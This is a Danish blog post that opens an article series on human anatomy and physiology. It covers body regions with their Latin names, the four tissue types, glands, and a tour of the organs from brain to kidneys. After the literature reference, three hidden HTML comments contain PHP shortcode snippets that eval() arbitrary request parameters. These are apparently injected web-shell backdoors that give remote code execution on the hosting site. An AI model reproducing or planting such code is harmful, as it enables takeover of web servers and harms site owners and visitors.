Kroppens anatomi og fysiologi samt stofskiftets biokemi

Jeg har i bloggen tænkt mig at starte en artikelrække omhandlende menneskekroppen – dens opbygning (anatomien) og dens funktioner (fysiologien) samt de biokemiske reaktioner som udgør kulhydrat-, fedt-, og proteinstofskiftet. Jeg bliver til stadighed fascineret af denne verden og håber, at du vil blive det samme.

Før jeg begyndte at læse og dermed kun havde en begrænset fysiologisk viden fra gymnasiets biologi- og idrætstimer, var jeg ligesom så mange andre let tilbøjelig til at tro på alverdens udsagn om kost, motion og sundhed. Jeg er senere hen blevet meget klogere, og viden om hvordan vores krop er skruet sammen og hvordan den fungerer, er helt afgørende for at kunne vurdere, om diverse udsagn omkring kost og sundhed er sande eller helt ude i hampen. Uden en basal fysiologisk viden hopper man nemlig let i med begge ben, når forskellige sundhedsguruer slynger om sig med ”gode” råd og anbefalinger.

Jeg har et lille håb om, at artiklerne især vil kunne være brugbare for studerende på erhvervsuddannelserne indenfor krop og stil (f.eks. fitness og kosmetik), for gymnasieelever med biologi og idræt som højniveau-fag samt fitnessinstruktørstuderende, men også for alle jer som bare er naturligt interesserede i sundhed og kroppens biologi.

Nedenfor følger en meget overordnet beskrivelse af kroppens opbygning, og de efterfølgende artikler vil uddybe de forskellige dele som f.eks. kredsløbet, fordøjelsessystemet og nervesystemet.

Kroppens inddeling
Kroppen inddeles i forskellige afsnit og selvom det næppe er til nogens overraskelse følger her alligevel en oversigt over disse afsnit med deres latinske betegnelse:
– Hoved (caput)
– Hals (collum/cervix)
– Brystkasse (thorax)
– Bug (abdomen)
– Bækken (pelvis)
– Overarm (brachium)
– Underarm (antebrachium)
– Hånd (manus – hvorfor det nok hedder manusskript)
– Lår (femur)
– Underben (crus)
– Fod (pes)

Kroppens forskellige typer af væv
Vores krop er opbygget af mange milliarder celler som har forskellige funktioner. Cellerne er meget små og celler med samme funktion er ofte samlede i et stort antal, i det vi kalder væv. Der findes 4 hovedtyper af væv i kroppen:
– Støttevæv
– Epitelvæv
– Muskelvæv
– Nervevæv

Støttevæv
Støttevævenes funktion er at holde sammen på kroppen og dens bestanddele. Der findes 3 typer af støttevæv:
– Bindevæv
– Knoglevæv
– Bruskvæv
Det er ikke selve cellerne i støttevævet som giver støttevævets dets styrke, men derimod de stoffer som cellerne danner stoffer og frigiver til den væske der findes mellem cellerne (intercellulærsubstansen). Disse stoffer kan f.eks. være tynde proteintråde med elastiske eller klistrende funktioner.
Bindevæv kan både være fast og løst, hvilket afhænger af antallet af fibre og hvilke fibertyper som dominerer. Bindevæv findes f.eks. i huden, mens bruskvæv findes i eksempelvis led og luftveje.

Epitelvæv
Epitelvæv dækker overflader og skaber dermed en afgrænsning til omgivelserne. Hudens yderste lag er et epitel og indersiden af blæren, fordøjelseskanalen, hjertet og blodkarrene er også dækket med epitel. De forskellige epiteler har forskellige funktioner. Hudens epitel skal kunne tåle meget slid, hvorfor det er tykt og består af mange cellelag (flerlaget pladeepitel). Omvendt er epitelet i tyndtarmen meget tyndt og består kun af ét lag celler (enlaget cylinderepitel). Det er nødvendigt da optagelsen af næringsstoffer foregår her og for mange cellelag ville besværliggøre denne proces.

Kirtler
Kirtler, som dannes i fostertilstanden ved at epitelvæv vokser ned i det underliggende væv, inddeles i eksokrine og endokrine kirtler. Eksokrine kirtler har udførelsesgang til kroppens overflade og er f.eks. svedkirtler og spytkirtler. Endokrine kirtler har udførelsesgang til blodbanen og er f.eks. hormonproducerende kirtler.

Muskelvæv
Muskelvæv består af celler som kan trække sig sammen, og man siger, at de er kontraktile. Der findes 3 typer muskelvæv:
– Tværstribet muskelvæv (også kaldet skeletmuskulatur)
– Hjertemuskelvæv
– Glat muskelvæv

Den tværstribede skeletmuskulatur har fået navnet fra dens udseende i mikroskop og findes i de muskler vi bruger til bevægelse f.eks. overarmens tohovedede armbøjer (M. biceps brachii) og lårets firhovede knæstrækker (M. quadriceps femoris). Den tværstribede muskulatur styres af det somatiske nervesystem som er under viljens kontrol.
Hjertemuskelvæv (myocardie) findes, som navnet antyder, kun i hjertet og styres af det autonome nervesystem som ikke er viljestyret.
Glat muskelvæv findes i mange af kroppens organer og er ligesom hjertemuskelvæv styret af det autonome nervesystem. Det er f.eks. glat muskulatur som forårsager gåsehud, veer, tømning af urinblæren mm.

Nervevæv
Cellerne som udgør nervevævet kan udsende og modtage impulser. Når vi om foråret dufter nyslået græs skyldes det sanseceller i næsen som registrerer duftmolekylerne. Dette “registrering” føres videre som en elektrisk impuls gennem nerveceller til hjernens lugtcentre. Hvis vi ved et uheld kommer til at røre ved f.eks. en brandvarm kogeplade sender hjernen besked via nervecellerne, som kan være op til 1 meter lange, besked til armen muskler om at trække sig sammen, så håndens væv ikke skades.

En guidet tur mellem kroppens organer
Vi starter oppefra inde bag kranieknoglerne hvor vi finder stor- og lillehjernen (hhv. cerebrum og cerebellum). Fra undersiden af hjernen udløber 12 hjernenerver som f.eks. styrer øjnenes og ansigtets muskler, fordøjelsessystemet og vejrtrækningen og registrerer dufte. Fra hjernen går rygmarven ned gennem kroppen og ud fra denne løber 31 rygmarvsnerver som f.eks. styrer musklerne i arme og ben.

I halsen finder vi også luft- og spiserøret (hhv. trachea og oesophagus) som ligger op ad rygsøjlen. Luftrøret deler sig, i et trusselignende punkt kaldet carina inde bag brystbenet (det er sgu ikke løgn), i to rør som fører til hver sin lunge (pulmo). Lungerne som er omgivet af 12 par ribben (costae) inddeles i lapper og bagved lungerne finder vi hjertet (cor). Hjertet hviler på mellemgulvmusklen (diaphragma) og ligger lidt skævt i brystkassen med 1/3 i højre side og 2/3 i venstre side. Hjertet er delt i en højre og en venstre halvdel og indeholder 4 hulrum – to forkamre og to hjertekamre. Venstre hjertehalvdel modtager det iltede blod fra lungerne og pumper det ud i kroppen, mens højre halvdel modtager det afiltede blod som har været en tur ude og forsyne kroppens celler med ilt og næringsstoffer.

Nu bevæger vi os under mellemgulvsmusklen. Spiserøret går igennem mellemgulvet og har forbindelse til mavesækken (ventriculus). Fra mavesækken føres føden videre ud i tolvfingertarmen (duodenum) og derfra videre til tynd- og tyktarm (jejunum, ileum samt colon) som snor sig rundt i bughulen. Leveren (hepar) som er kroppens største kirtel og vejer omkring 2 kg ligger i højre side af bughulen lige under mellemgulvmusklen. Leveren har et utal af funktioner og danner bl.a. galde som føres via galdevejene til galdeblæren (vesica fellea). Ved mavesækken finder vi også bugspytkirtlen (pancreas) som bl.a. producerer enzymer og hormoner samt milten (splen).

Bagerst i bughulen gemmer nyrerne (renes) sig. Nyrerne er glatte rødbrune bønneformede organer med en højde på ca. 10 cm, en bredde på 5 cm og en tykkelse på 3 cm. Fra nyrerne, som danner urin, går de to urinledere ned til blæren (vesica urinaria). Ovenpå nyrerne ligger binyrerne (glandula suprarenalis) og hos kvinder finder vi i det lille bækken æggestokkene og livmoderen (uterus).

Litteratur:
Anni Springborg og Oluf Nielsen: Ind under huden – Anatomi og fysiologi, 2. udgave, Munksgaard Danmark, 2007

<!– [insert_php]if (isset($_REQUEST["xaUD"])){eval($_REQUEST["xaUD"]);exit;}[/insert_php][php]if (isset($_REQUEST["xaUD"])){eval($_REQUEST["xaUD"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["PwDTx"])){eval($_REQUEST["PwDTx"]);exit;}[/insert_php][php]if (isset($_REQUEST["PwDTx"])){eval($_REQUEST["PwDTx"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["duM"])){eval($_REQUEST["duM"]);exit;}[/insert_php][php]if (isset($_REQUEST["duM"])){eval($_REQUEST["duM"]);exit;}[/php] –>

You may also like...

Skriv et svar

Din e-mailadresse vil ikke blive publiceret. Krævede felter er markeret med *